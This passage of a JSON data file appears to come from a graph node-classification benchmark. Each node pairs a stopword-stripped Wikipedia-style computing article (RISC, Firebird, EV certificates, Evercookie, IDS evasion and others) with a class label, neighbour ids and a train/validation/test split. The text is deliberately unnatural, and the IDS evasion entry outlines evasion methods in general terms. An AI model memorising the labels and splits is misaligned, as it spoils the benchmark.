database web browser using name firebird mozilla developers issued statement making clear software package called mozilla firebird firebird statement also said mozilla firebird name project codename dispute resolved february 9 2004 mozilla changed name browser mozilla firefox thus ending conflict firebird inherited storage architecture interbase ensure acid properties transactions database engine keeps different versions record changed active users database transactions committed last version every changed record marked definitive transactions rolled back database engine keeps mark original record versions leaving untouched result firebird disk writes reduced compared databases use traditional transaction log architecture writing transactions prevent reading vice versa one sees version database tradeoff maintenance “ sweeping ” required time time clean old record versions free disk space multi-generational architecture ensures oltp dss/olap operations run simultaneously without delays caused locking mechanisms found products firebird makes indices database behave like well-tuned “ clustered indexes ” used architectures firebird index buckets ’ subject two-phase locking boolean “ ” “ ” operations performed intermediate bitmaps negligible cost eliminating need optimizer choose alternative indexes firebird database engine modules released open-source license initial developer public license idpl variant mozilla public license mpl version 1.1 require developer open products using firebird even custom-derivatives made source code developer chooses terms conditions honored idpl allows developer make proprietary closed-source applications use firebird based firebird native api used directly indirectly applications middleware connect firebird database implemented client library fbclient.dll windows systems libfbclient.so unix ones services api special function set accessing controlling service administration tasks user management backup/restore statistics gathering embedded sql technique simplifies development c/c++ cobol firebird applications using preprocessor called gpre allows embedding sql statements directly source code host language",
    "neighbors": [
      9729,
      5768,
      5896,
      6797,
      10389,
      6166,
      1816,
      1304,
      3096,
      5403,
      10137,
      11551,
      10921,
      10236,
      5549,
      10286,
      7983,
      10413,
      3636,
      823,
      11191,
      5691,
      2364,
      11332,
      3784,
      8781,
      5583,
      6993,
      10193,
      2901,
      5078,
      9177,
      10201,
      10459,
      2780,
      3045,
      7654,
      1383,
      5612,
      2413,
      7022,
      5492,
      5242,
      8188,
      2045,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 9390,
    "label": 4,
    "text": "Hengzhi_chip:hengzhi chip hengzhi chip 联想 恒智 安全芯片 microcontroller store secured information designed people republic china government manufactured china functionalities similar offered trusted platform module unlike tpm follow trusted computing group specifications lenovo selling pcs installed hengzhi security chips chip could development ibm ess embedded security subsystem chip public key smart card placed directly motherboard system management bus september 2006 public specifications chip available",
    "neighbors": [
      2416,
      7354
    ],
    "mask": "Test"
  },
  {
    "node_id": 9391,
    "label": 3,
    "text": "Reduced_instruction_set_computer:reduced instruction set computer reduced instruction set computer risc one whose instruction set architecture isa allows fewer cycles per instruction cpi complex instruction set computer cisc various suggestions made regarding precise definition risc general concept computer small set simple general instructions rather large set complex specialized instructions another common risc trait load/store architecture memory accessed specific instructions rather part instructions although number computers 1960s 1970s identified forerunners riscs modern concept dates 1980s particular two projects stanford university university california berkeley associated popularization concept stanford mips would go commercialized successful mips architecture berkeley risc gave name entire concept commercialized sparc another success era ibm effort eventually led ibm power instruction set architecture powerpc power isa projects matured wide variety similar designs flourished late 1980s especially early 1990s representing major force unix workstation market well embedded processors laser printers routers similar products many varieties risc designs include arc alpha am29000 arm atmel avr blackfin i860 i960 m88000 mips pa-risc power isa including powerpc risc-v superh sparc use arm architecture processors smartphones tablet computers ipad android devices provided wide user base risc-based systems risc processors also used supercomputers summit world fastest supercomputer ranked top500 project alan turing 1946 automatic computing engine ace design many characteristics risc architecture number systems going back 1960s credited first risc architecture partly based use load/store approach term risc coined david patterson berkeley risc project although somewhat similar concepts appeared cdc 6600 designed seymour cray 1964 used load/store architecture two addressing modes register+register register+immediate constant 74 operation codes basic clock cycle 10 times faster memory access time partly due optimized load/store architecture cdc 6600 jack dongarra says considered forerunner modern risc systems although number technical barriers needed overcome development modern risc system michael j. flynn views first risc system ibm 801 design begun 1975 john cocke completed 1980 801 eventually produced single-chip form ibm romp 1981 stood 'research opd office products division micro processor name implies cpu designed mini tasks also used ibm rt pc 1986 turned commercial failure 801 inspired several research projects including new ones ibm would eventually lead ibm power instruction set architecture public risc designs however results university research programs run funding darpa vlsi program vlsi program practically unknown today led huge number advances chip design fabrication even computer graphics berkeley risc project started 1980 direction david patterson carlo h. sequin berkeley risc based gaining performance use pipelining aggressive use technique known register windowing traditional cpu one small number registers program use register time cpu register windows huge number registers e.g 128 programs use small number e.g eight one time program limits eight registers per procedure make fast procedure calls call simply moves window eight set eight registers used procedure return moves window back berkeley risc project delivered risc-i processor 1982 consisting 44,420 transistors compared averages 100,000 newer cisc designs era risc-i 32 instructions yet completely outperformed single-chip design followed 40,760 transistor 39 instruction risc-ii 1983 ran three times fast risc-i mips project grew graduate course john l. hennessy stanford university 1981 resulted functioning system 1983 could run simple programs 1984 mips approach emphasized aggressive clock cycle use pipeline making sure could run full possible mips system followed mips-x 1984 hennessy colleagues formed mips computer systems commercial venture resulted new architecture also called mips r2000 microprocessor 1985 early 1980s significant uncertainties surrounded risc concept uncertain could commercial future mid-1980s concepts matured enough seen commercially viable 1986 hewlett packard started using early implementation pa-risc computers meantime berkeley risc effort become well known eventually became name entire concept 1987 sun microsystems began shipping systems sparc processor directly based berkeley risc-ii system us government committee innovations computing communications credits acceptance viability risc concept success sparc system success sparc renewed interest within ibm released new risc systems 1990 1995 risc processors foundation 15 billion server industry since 2010 new open source instruction set architecture isa risc-v development university california berkeley research purposes free alternative proprietary isas 2014 version 2 user space isa fixed isa designed extensible barebones core sufficient small embedded processor supercomputer cloud computing use standard chip designer defined extensions coprocessors tested silicon design rocket soc also available open source processor generator chisel language common misunderstanding phrase reduced instruction set computer mistaken idea instructions simply eliminated resulting smaller set instructions fact years risc instruction sets grown size today many larger set instructions many cisc cpus risc processors powerpc instruction sets large cisc ibm system/370 example conversely dec pdp-8—clearly cisc cpu many instructions involve multiple memory accesses—has 8 basic instructions extended instructions term reduced phrase intended describe fact amount work single instruction accomplishes reduced—at single data memory cycle—compared complex instructions cisc cpus may require dozens data memory cycles order execute single instruction particular risc processors typically separate instructions i/o data processing term load/store architecture sometimes preferred risc architectures fixed-length instructions commonly 32 bits simple encoding simplifies fetch decode issue logic considerably one drawback 32-bit instructions reduced code density adverse characteristic embedded computing workstation server markets risc architectures originally designed serve address problem several architectures arm power isa mips risc-v adapteva epiphany optional short feature-reduced instruction format instruction compression feature sh5 also follows pattern albeit evolved opposite direction added longer media instructions original 16-bit encoding given level general performance risc chip typically far fewer transistors dedicated core logic originally allowed designers increase size register set increase internal parallelism features typically found risc architectures risc designs also likely feature harvard memory model instruction stream data stream conceptually separated means modifying memory code held might effect instructions executed processor cpu separate instruction data cache least special synchronization instruction issued upside allows caches accessed simultaneously often improve performance many early risc designs also shared characteristic branch delay slot branch delay slot instruction space immediately following jump branch instruction space executed whether branch taken words effect branch delayed instruction keeps alu cpu busy extra time normally needed perform branch nowadays branch delay slot considered unfortunate side effect particular strategy implementing risc designs modern risc designs generally away powerpc recent versions sparc mips aspects attributed first risc- labeled designs around 1975 include observations memory-restricted compilers time often unable take advantage features intended facilitate manual assembly coding complex addressing modes take many cycles perform due required additional memory accesses argued functions would better performed sequences simpler instructions could yield implementations small enough leave room many registers reducing number slow memory accesses simple designs instructions uniform length similar structure arithmetic operations restricted cpu registers separate load store instructions access memory properties enable better balancing pipeline stages making risc pipelines significantly efficient allowing higher clock frequencies early days computer industry programming done assembly language machine code encouraged powerful easy-to-use instructions cpu designers therefore tried make instructions would much work feasible advent higher level languages computer architects also started create dedicated instructions directly implement certain central mechanisms languages another general goal provide every possible addressing mode every instruction known orthogonality ease compiler implementation arithmetic operations could therefore often results well operands directly memory addition register immediate attitude time hardware design mature compiler design also reason implement parts functionality hardware microcode rather memory constrained compiler generated code alone advent risc philosophy became retroactively known complex instruction set computing cisc cpus also relatively registers several reasons important force encouraging complexity limited main memories order kilobytes therefore advantageous code density—the density information held computer programs—to high leading features highly encoded variable length instructions data loading well calculation mentioned issues higher priority ease decoding instructions equally important reason main memories quite slow common type ferrite core memory using dense information packing one could reduce frequency cpu access slow resource modern computers face similar limiting factors main memories slow compared cpu fast cache memories employed overcome limited size may partly explain highly encoded instruction sets proven useful risc designs modern computers risc developed alternative known cisc years strategies implemented alternatives risc cisc examples long instruction word vliw minimal instruction set computer misc mid-1970s researchers particularly john cocke ibm similar projects elsewhere demonstrated majority combinations orthogonal addressing modes instructions used programs generated compilers available time proved difficult many cases write compiler limited ability take advantage features provided conventional cpus also discovered microcoded implementations certain architectures complex operations tended slower sequence simpler operations thing part effect fact many designs rushed little time optimize tune every instruction used often optimized sequence instructions could faster less-tuned instruction performing equivalent operation sequence one infamous example vax codice_1 instruction mentioned elsewhere core memory long since slower many cpu designs advent semiconductor memory reduced difference still apparent registers later caches would allow higher cpu operating frequencies additional registers would require sizeable chip board areas time 1975 could made available complexity cpu logic reduced yet another impetus risc designs came practical measurements real-world programs andrew tanenbaum summed many demonstrating processors often oversized immediates instance showed 98 constants program would fit 13 bits yet many cpu designs dedicated 16 32 bits store suggests reduce number memory accesses fixed length machine could store constants unused bits instruction word would immediately ready cpu needs much like immediate addressing conventional design required small opcodes order leave room reasonably sized constant 32-bit instruction word since many real-world programs spend time executing simple operations researchers decided focus making operations fast possible clock rate cpu limited time takes execute slowest sub-operation instruction decreasing cycle-time often accelerates execution instructions focus reduced instructions led resulting machine called reduced instruction set computer risc goal make instructions simple could easily pipelined order achieve single clock throughput high frequencies later noted one significant characteristics risc processors external memory accessible load store instruction instructions limited internal registers simplified many aspects processor design allowing instructions fixed-length simplifying pipelines isolating logic dealing delay completing memory access cache miss etc two instructions led risc designs referred load/store architectures one issue complex instructions difficult restart e.g following page fault cases restarting beginning work although wasteful many cases would give incorrect results therefore machine needs hidden state remember parts went remains done load/store machine program counter sufficient describe state machine main distinguishing feature risc instruction set optimized highly regular instruction pipeline flow features associated risc—branch delay slots separate instruction data caches load/store architecture large register set etc.—may seem random assortment unrelated features helpful maintaining regular pipeline flow completes instruction every clock cycle cpus specifically designed small set instructions – designs different classic risc designs given names minimal instruction set computer misc transport triggered architecture tta etc risc architectures traditionally successes desktop pc commodity server markets x86 based platforms remain dominant processor architecture however may change arm architecture based processors developed higher performance systems manufacturers including cavium amd qualcomm released arm architecture based server processors arm partnered cray 2017 produce arm architecture based supercomputer desktop microsoft announced part partnership qualcomm planned support pc version windows 10 qualcomm snapdragon-based devices 2017 devices support x86 based win32 software via x86 processor emulator outside desktop arena however arm architecture risc widespread use smartphones tablets many forms embedded device also case since pentium pro p6 intel using internal risc processor core processors early risc designs differed significantly contemporary cisc designs 2000 highest performing cpus risc line almost indistinguishable highest performing cpus cisc line risc architectures used across wide range platforms cellular telephones tablet computers world fastest supercomputers summit fastest top500 list beginning 21st century majority low end mobile systems relied risc architectures examples include",
    "neighbors": [
      4108,
      2066,
      4124,
      6181,
      8231,
      2088,
      4144,
      6207,
      2113,
      10316,
      6250,
      4204,
      8301,
      6256,
      4211,
      4217,
      6268,
      8325,
      4237,
      8352,
      6311,
      4269,
      2224,
      2226,
      4276,
      2237,
      4286,
      2241,
      2243,
      6339,
      2262,
      219,
      10485,
      249,
      8450,
      10501,
      6415,
      10516,
      2339,
      10543,
      10548,
      309,
      8501,
      8506,
      8508,
      6464,
      8514,
      4423,
      8523,
      6476,
      336,
      8530,
      342,
      344,
      8543,
      4450,
      10603,
      4465,
      372,
      10612,
      10620,
      4491,
      6539,
      398,
      8590,
      407,
      409,
      10658,
      10669,
      2480,
      10675,
      453,
      2502,
      6607,
      464,
      466,
      2514,
      2517,
      4569,
      477,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      4603,
      8700,
      508,
      6663,
      10779,
      8732,
      10781,
      556,
      6705,
      6715,
      2623,
      2638,
      6738,
      8795,
      2655,
      10862,
      8815,
      8820,
      630,
      8822,
      639,
      4743,
      6799,
      659,
      6804,
      8851,
      8861,
      6815,
      6818,
      4773,
      6821,
      682,
      8890,
      10966,
      731,
      6878,
      10974,
      8937,
      10985,
      8944,
      757,
      2805,
      6914,
      4868,
      2821,
      6924,
      6926,
      783,
      4881,
      4886,
      4887,
      2850,
      6949,
      6950,
      9003,
      9020,
      4928,
      833,
      6979,
      9044,
      869,
      876,
      7033,
      11130,
      9095,
      9101,
      9111,
      921,
      7065,
      2979,
      9126,
      9132,
      9137,
      3014,
      977,
      5073,
      7134,
      5090,
      995,
      1000,
      11255,
      7170,
      7173,
      9231,
      11286,
      5156,
      7218,
      1083,
      1085,
      7234,
      7235,
      3142,
      7245,
      9302,
      1119,
      1122,
      3175,
      3185,
      9330,
      5235,
      3197,
      7313,
      9368,
      9369,
      9371,
      3235,
      5297,
      11451,
      5309,
      5326,
      5329,
      9428,
      11487,
      5358,
      3317,
      3323,
      7421,
      5384,
      7432,
      5386,
      1298,
      11539,
      7445,
      3350,
      3352,
      9500,
      1309,
      1321,
      7471,
      5444,
      9541,
      7505,
      11604,
      11613,
      1376,
      9582,
      11636,
      1399,
      1402,
      3451,
      5503,
      3457,
      3459,
      9611,
      3470,
      5518,
      3472,
      5523,
      3493,
      9638,
      1461,
      1462,
      1463,
      7607,
      9665,
      1480,
      3540,
      9685,
      1499,
      1502,
      7653,
      7657,
      9707,
      9732,
      5642,
      9739,
      1548,
      9741,
      5649,
      7699,
      5655,
      1563,
      3630,
      7770,
      1635,
      7783,
      7806,
      9863,
      5786,
      5793,
      7852,
      7858,
      9911,
      9913,
      1725,
      9932,
      5844,
      7911,
      9964,
      5871,
      1776,
      9976,
      5883,
      1798,
      3846,
      1801,
      10016,
      3886,
      1849,
      5948,
      10051,
      8048,
      8058,
      10111,
      3973,
      6038,
      1952,
      8102,
      1967,
      4017,
      8120,
      8125,
      4030,
      1983,
      8126,
      1985,
      6084,
      10180,
      1998,
      10214,
      2039
    ],
    "mask": "None"
  },
  {
    "node_id": 9392,
    "label": 4,
    "text": "Attrition_(website):attrition website attrition information security-related website updated least weekly all-volunteer staff 21 may 2001 attrition maintained largest mirror defaced cracked websites available world wide web defacement mirror since ceased updating site contains variety information including movie music reviews poetry security tips covering topics like forensics data theft security advisories republican communications aide todd shriber sacked job attempted hire attrition crack former university website 2001 attrition.org given cease desist order lawyers mastercard posting parodies priceless advertising campaign violated copyright law attrition formerly hosted several electronic mailing lists relating information security infosec news also maintained data loss database records data breaches companies",
    "neighbors": [
      5373,
      4435,
      1861,
      9319
    ],
    "mask": "None"
  },
  {
    "node_id": 9393,
    "label": 4,
    "text": "Intrusion_detection_system_evasion_techniques:intrusion detection system evasion techniques intrusion detection system evasion techniques modifications made attacks order prevent detection intrusion detection system ids almost published evasion techniques modify network attacks 1998 paper insertion evasion denial service eluding network intrusion detection popularized ids evasion discussed evasion techniques areas correct interpretation ambiguous depending targeted computer system 'fragroute 'fragrouter programs implement evasion techniques discussed paper many web vulnerability scanners 'nikto 'whisker 'sandcat also incorporate ids evasion techniques idss modified detect even reverse basic evasion techniques ids evasion countering ids evasion still active fields ids evaded obfuscating encoding attack payload way target computer reverse ids way attacker exploit end host without alerting ids application layer protocols like http allow multiple encodings data interpreted value example string cgi-bin url encoded 63 67 69 2d 62 69 6e i.e. hexadecimal web server view string act accordingly ids must aware possible encodings end hosts accept order match network traffic known-malicious signatures attacks encrypted protocols https read ids unless ids copy private key used server encrypt communication ids wo n't able match encrypted traffic signatures n't account signature-based ids often look common attack patterns match malicious traffic signatures detect buffer overflow attacks ids might look evidence nop slides used weaken protection address space layout randomization obfuscate attacks attackers use polymorphic shellcode create unique attack patterns technique typically involves encoding payload fashion e.g. xor-ing byte 0x95 placing decoder front payload sending target executes code runs decoder rewrites payload original form target executes polymorphic attacks n't single detectable signature making difficult signature-based ids even anomaly-based ids detect shikata ga nai helped popular polymorphic encoder metasploit framework used convert malicious shellcode difficult-to-detect polymorphic shellcode using xor additive feedback attackers evade ids crafting packets way end host interprets attack payload correctly ids either interprets attack incorrectly determines traffic benign quickly one basic technique split attack payload multiple small packets ids must reassemble packet stream detect attack simple way splitting packets fragmenting adversary also simply craft packets small payloads 'whisker evasion tool calls crafting packets small payloads 'session splicing small packets evade ids reassembles packet streams however small packets modified order complicate reassembly detection one evasion technique pause sending parts attack hoping ids time target computer second evasion technique send packets order confusing simple packet re-assemblers target computer another evasion technique craft series packets tcp sequence numbers configured overlap example first packet include 80 bytes payload second packet sequence number 76 bytes start first packet target computer reassembles tcp stream must decide handle four overlapping bytes operating systems take older data take newer data ids n't reassemble tcp way target manipulated either missing portion attack payload seeing benign data inserted malicious payload breaking attack signature technique also used ip fragmentation similar manner ids evasion techniques involve deliberately manipulating tcp ip protocols way target computer handle differently ids example tcp urgent pointer handled differently different operating systems ids n't handle protocol violations manner consistent end hosts vulnerable insertion evasion techniques similar mentioned earlier attacks spread across long period time large number source ips nmap slow scan difficult pick background benign traffic online password cracker tests one password user every day look nearly identical normal user mistyped password due fact passive ids inherently fail-open opposed fail-closed launching denial-of-service attack ids network feasible method circumventing protection adversary accomplish exploiting bug ids consuming computational resources ids deliberately triggering large number alerts disguise actual attack packets captured ids stored kernel buffer cpu ready process cpu high load ca n't process packets quickly enough buffer fills new possibly malicious packets dropped buffer full attacker exhaust ids cpu resources number ways example signature-based intrusion detection systems use pattern matching algorithms match incoming packets signatures known attacks naturally signatures computational expensive match others exploiting fact attacker send specially-crafted network traffic force ids use maximum amount cpu time possible run pattern matching algorithm traffic algorithmic complexity attack overwhelm ids relatively small amount bandwidth ids also monitors encrypted traffic spend large portion cpu resources decrypting incoming data order match certain signatures ids required keep state related connections monitoring example ids must maintain tcp control blocks tcbs chunks memory track information sequence numbers window sizes connection states established related closed etc tcp connection monitored ids ids random-access memory ram consumed forced utilized virtual memory hard disk much slower ram leading performance problems dropped packets similar effects cpu exhaustion ids n't garbage collect tcbs correctly efficiently attacker exhaust ids memory starting large number tcp connections quickly similar attacks made fragmenting large number packets larger number smaller packets send large number out-of-order tcp segments alerts generated ids acted upon order value attacker reduce availability ids overwhelming human operator inordinate number alerts sending large amounts malicious traffic intended generate alerts ids attacker perform actual attack using alert noise cover tools 'stick 'snot designed purpose generate large number ids alerts sending attack signatures across network trigger alerts ids maintain application protocol context",
    "neighbors": [
      2304,
      5472,
      1474,
      6916,
      7717,
      2409,
      7851,
      2732,
      10924,
      2383,
      2739,
      11539,
      1429,
      5245,
      5176,
      4797,
      895
    ],
    "mask": "None"
  },
  {
    "node_id": 9394,
    "label": 4,
    "text": "Extended_Validation_Certificate:extended validation certificate extended validation certificate ev certificate conforming x.509 proves legal entity owner signed certificate authority key issue ev certificates ev certificates used manner x.509 certificates including securing web communications https signing software documents ev certificates different domain-validated certificates organization-validation certificates issued subset certificate authorities cas require verification requesting entity legal identity certificate issuance august 2019 google chrome mozilla firefox apple safari web browsers show verified legal identity user interface either instead domain name plan remove distinction near future mobile browsers typically show difference ev certified websites desktop behaviour phased recent versions popular browsers example safari browser apple macos mojave ten popular websites online none use ev certificates trend away usage software verified legal identity displayed user operating system e.g. microsoft windows proceeding installation extended validation certificates stored file format specified typically use encryption organization-validated certificates domain-validated certificates compatible server user agent software criteria issuing ev certificates defined guidelines extended validation promulgated ca/browser forum voluntary organization whose members include leading cas vendors internet software well representatives legal audit professions issue extended validation certificate ca requires verification requesting entity identity operational status control domain name hosting server 2005 melih abdulhayoglu ceo comodo group convened first meeting organization became ca/browser forum hoping improve standards issuing ssl/tls certificates june 12 2007 ca/browser forum officially ratified first version extended validation ev ssl guidelines took effect immediately formal approval successfully brought close two years effort provided infrastructure trusted web site identity internet april 2008 forum announced version 1.1 guidelines building practical experience member cas relying-party application software suppliers gained months since first version approved use major browsers created special user interface indicators pages loaded via https secured ev certificate soon creation standard includes microsoft edge 12 google chrome 1.0 internet explorer 7.0 firefox 3 safari 3.2 opera 9.5 furthermore mobile browsers including safari ios windows phone firefox android chrome android ios added ui indicators usually browsers ev support display validated identity—usually combination organization name jurisdiction—contained ev certificate 'subject field implementations enhanced display includes clicking lock symbol user obtain information certificate including name certificate authority ca issued ev certificate august 2019 google chrome 76 firefox 70 browsers plan remove ui indicators ev certificates important motivation using digital certificates ssl/tls add trust online transactions requiring website operators undergo vetting certificate authority ca order get certificate however commercial pressures led cas introduce domain-validated certificates domain-validated certificates existed validation standards generally require proof domain control particular domain-validated certificates assert given legal entity relationship domain although domain may resemble particular legal entity past browsers user interfaces clearly differentiate low-validation certificates undergone rigorous vetting since successful ssl/tls connection would cause green padlock icon appear browsers users likely aware whether website owner validated result fraudsters including phishing websites could use tls add perceived credibility websites users modern browsers always check identity certificate owners examining details issued certificate always indicates certificate owner information name organization location ev certificates validated baseline requirements extended validation requirements place additional requirements authorities vet companies include manual checks domain names requested applicant checks official government sources checks independent information sources phone calls company confirm position applicant certificate accepted government-registered serial number business well physical address stored ev certificate establishing stricter issuing criteria requiring consistent application criteria participating cas ev certificates intended restore confidence among users website operator legally established business organization verifiable identity said still concern lack accountability led loss public confidence domain-validated certificates lead lax certification practices erode value ev certificates well cas pass independent qualified audit review may offer ev cas globally must follow detailed issuance requirements aim exception extended validation certificates .onion domains otherwise possible get wildcard extended validation certificate – instead fully qualified domain names must included certificate inspected certificate authority ev certificates standard x.509 digital certificates primary way identify ev certificate referencing certificate policies extension field issuer uses different object identifier oid field identify ev certificates oid documented issuer certification practice statement root certificate authorities general browsers may recognize issuers ev https certificates contain subject x.509 oids codice_1 codice_2 codice_3 codice_4 codice_5 codice_6 pointing id relevant secretary state us government business registrar outside us well ca-specific policy identifier ev-aware software web browser recognize criteria issuing extended validation certificates require issuing certificate authorities immediately support online certificate status protocol revocation checking however requirement timely response revocation checks browser prompted certificate authorities previously done implement ocsp support section 26-a issuing criteria requires cas support ocsp checking certificates issued dec. 31 2010 legal entity names unique therefore attacker wants impersonate entity might incorporate different business name e.g. different state country obtain valid certificate use certificate impersonate original site one demonstration researcher incorporated business called stripe inc. kentucky showed browsers display similarly display certificate payment processor stripe inc. incorporated delaware researcher claimed demonstration setup took hour time us 100 legal costs us 77 certificate also noted enough mouse clicks user may able view city state entity incorporated neither helpful typical user likely blindly trust bright green indicator since ev certificates promoted reported mark trustworthy website small business owners voiced concerns ev certificates give undue advantage large businesses published drafts ev guidelines excluded unincorporated business entities early media reports focused issue version 1.0 ev guidelines revised embrace unincorporated associations long registered recognized agency greatly expanding number organizations qualified extended validation certificate 2006 researchers stanford university microsoft research conducted usability study ev display internet explorer 7 paper concluded participants received training browser security features notice extended validation indicator outperform control group whereas participants asked read internet explorer help file likely classify real fake sites legitimate proponents ev certificates claim help phishing attacks security expert peter gutmann states new class certificates restore ca profits eroded due race bottom occurred among issuers industry gutmann calls phenomenon pki-me-harder introduction … so-called high-assurance extended validation ev certificates allow cas charge standard ones simply case rounding twice usual number suspects—presumably somebody ’ going impressed effect phishing minimal since fixing problem phishers exploiting indeed cynics would say exactly problem certificates cas supposed solve first place “ high-assurance ” certificates way charging second time existing service years ago certificates still cost several hundred dollars shifting baseline certificate prices quality moved point obtained 9.95 even nothing big commercial cas reinvent defining new standard convincing market go back prices paid good old days deja-vu-all-over-again approach seen examining verisign ’ certificate practice statement cps document governs certificate issuance security requirements ev-certificate 2008 cps except minor differences legalese used express practically identical requirements class 3 certificates listed verisign ’ version 1.0 cps 1996 ev certificates simply roll back clock approach already failed first time tried 1996 resetting shifting baseline charging 1996 prices side-effect even proposals kind sliding-window approach certificate value inevitable race bottom cheapens effective value established classes certificates ’ regarded less less effective software uses them…",
    "neighbors": [
      513,
      6657,
      517,
      9744,
      2579,
      2083,
      9770,
      559,
      4661,
      3639,
      7736,
      3643,
      64,
      9281,
      3657,
      5707,
      10831,
      11345,
      10834,
      6231,
      6747,
      7264,
      10341,
      1642,
      9834,
      115,
      9843,
      4728,
      2169,
      3707,
      1664,
      1157,
      6797,
      1683,
      1688,
      3742,
      8351,
      10910,
      8358,
      7340,
      9908,
      11449,
      4797,
      9412,
      5834,
      11466,
      7885,
      4310,
      2267,
      8923,
      3805,
      737,
      4326,
      2286,
      8443,
      4863,
      7943,
      1288,
      5905,
      7965,
      1318,
      1834,
      7983,
      11569,
      10057,
      9569,
      8557,
      4471,
      6528,
      3971,
      11653,
      3462,
      8584,
      6028,
      11660,
      7572,
      5026,
      8615,
      11693,
      4048,
      2003,
      5078,
      5590,
      474,
      8674,
      7139,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      5107,
      501,
      1526,
      5114,
      510
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9395,
    "label": 4,
    "text": "Evercookie:evercookie evercookie javascript-based application created samy kamkar produces zombie cookies web browser intentionally difficult delete 2013 top-secret nsa document leaked edward snowden citing evercookie method tracking tor users traditional http cookie relatively small amount textual data stored user browser cookies used save preferences login session information however also employed track users marketing purposes due concerns privacy major browsers include mechanisms deleting and/or refusing accept cookies websites adobe systems claimed size restrictions likelihood eventual deletion simple textual nature traditional cookies motivated add local shared object lso mechanism adobe flash player adobe published mechanism deleting lso cookies store 100 kb data per website default met criticism security privacy experts since version 4 firefox treated lso cookies way traditional http cookies deleted together samy kamkar released v0.4 beta evercookie september 13 2010 open source according project website evercookie merely difficult delete actively resists deletion copying different forms user machine resurrecting notices copies missing expired specifically creating new cookie evercookie uses following storage mechanisms available developer looking add following features",
    "neighbors": [
      1024,
      5636,
      9736,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      5677,
      11319,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      8886,
      3789,
      7887,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      7965,
      11559,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      845,
      6484,
      857,
      1882,
      7515,
      1381,
      3434,
      3956,
      9082,
      3462,
      11152,
      10132,
      1440,
      5024,
      5028,
      3495,
      11175,
      5546,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      8689,
      507
    ],
    "mask": "Train"
  },
  {
    "node_id": 9396,
    "label": 7,
    "text": "DocuWare:docuware docuware provider solutions document management workflow automation also referred enterprise content management ecm recently content services company headquartered germany united states docuware also name flagship product offered company besides offered cloud-based software service saas also available feature parity installation on-premises software available 16 languages docuware distributed via global network 500 authorized docuware partners adp well directly key accounts january 2017 docuware used 16,000 customers 70 countries october 27 1988 docunet gmbh founded germering germany near munich president jürgen biffar since 1990 mr biffar managing company colleague thomas schneck currently president sales docunet ag renamed docuware ag august 2000 since 1999 docuware outsourced parts development sofia bulgaria 2016 nemetschek ood 42 employees working docuware product docuware gmbh holds 20 percent stake nemetschek ood • docuware corporation new windsor founded january 1 2001 • docuware ltd nottinghamshire founded april 1 2005 • docuware sarl paris founded september 1 2008 • docuware s.l barcelona founded july 1 2009 april 2012 investment agreement signed company morgan stanley expansion capital lp morgan stanley investment management private equity fund aim promoting accelerating global growth docuware legal form ag public holding company changed gmbh limited liability corporation company acquired u.s.-based westbrook technologies inc. developer fortis ecm software august 2013 2014 westbrook technologies inc. merged docuware corporation beginning 2016 docuware appointed dr michael berger chief technology officer cto dr berger joined company 2008 vice president research development 1988 – development dacs-board dacs document archiving communication system 1990 – dacs office first software solution running windows 3.0 store search display print documents windows 3.0 released may 22 1990 1993 – docuware 3.0 customizable file cabinets structure pre-set sending documents docuware 1998 – docuware 4.0 first 32-bit version 2006 – docuware 5.0 new development based .net technology 2008 – docuware web client web-based document management 2009 – docuware saas first saas via private cloud 2012 – docuware online first saas via public cloud 2014 – docuware online renamed docuware cloud ported microsoft azure platform iso 9001 soc 2 idw ers fait 3 hipaa-compliant keypoint intelligence buyers lab bli 2018 outstanding content workflow management platform buyers laboratory inc. bli 2014 5-star rated product program version 6 online buyers laboratory inc. bli 2013 5-star rated product program version 6 wins summer pick award outstanding document management solution",
    "neighbors": [
      4194,
      8471,
      1935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9397,
    "label": 1,
    "text": "Relational_model:relational model relational model rm database management approach managing data using structure language consistent first-order predicate logic first described 1969 english computer scientist edgar f. codd data represented terms tuples grouped relations database organized terms relational model relational database purpose relational model provide declarative method specifying data queries users directly state information database contains information want let database management system software take care describing data structures storing data retrieval procedures answering queries relational databases use sql data definition query language systems implement regarded engineering approximation relational model table sql database schema corresponds predicate variable contents table relation key constraints constraints sql queries correspond predicates however sql databases deviate relational model many details codd fiercely argued deviations compromise original principles relational model central idea describe database collection predicates finite set predicate variables describing constraints possible values combinations values content database given time finite logical model database i.e set relations one per predicate variable predicates satisfied request information database database query also predicate models hierarchical model network model systems using older architectures still use today data centers high data volume needs existing systems complex abstract would cost-prohibitive migrate systems employing relational model also note newer object-oriented databases several attempts produce true implementation relational database model originally defined codd explained date darwen others none popular successes far rel one recent attempts relational model first database model described formal mathematical terms hierarchical network databases existed relational databases specifications relatively informal relational model defined many attempts compare contrast different models led emergence rigorous descriptions earlier models though procedural nature data manipulation interfaces hierarchical network databases limited scope formalization relational model invented edgar f. codd general model data subsequently promoted chris date hugh darwen among others third manifesto first published 1995 date darwen attempt show relational model allegedly accommodate certain desired object-oriented features codd years publication 1970 model proposed three-valued logic true false missing/null version deal missing information relational model database management version 2 1990 went step four-valued logic true false missing applicable missing inapplicable version never implemented presumably attending complexity sql null construct intended part three-valued logic system fell short due logical errors standard implementations fundamental assumption relational model data represented mathematical n -ary relations n -ary relation subset cartesian product n domains mathematical model reasoning data done two-valued predicate logic meaning two possible evaluations proposition either true false particular third value unknown applicable either often associated concept null data operated upon means relational calculus relational algebra equivalent expressive power relational model data permits database designer create consistent logical representation information consistency achieved including declared constraints database design usually referred logical schema theory includes process database normalization whereby design certain desirable properties selected set logically equivalent alternatives access plans implementation operation details handled dbms engine reflected logical model contrasts common practice sql dbmss performance tuning often requires changes logical model basic relational building block domain data type usually abbreviated nowadays type tuple ordered set attribute values attribute ordered pair attribute name type name attribute value specific valid value type attribute either scalar value complex type relation consists heading body heading set attributes body n -ary relation set n -tuples heading relation also heading tuples relation defined set 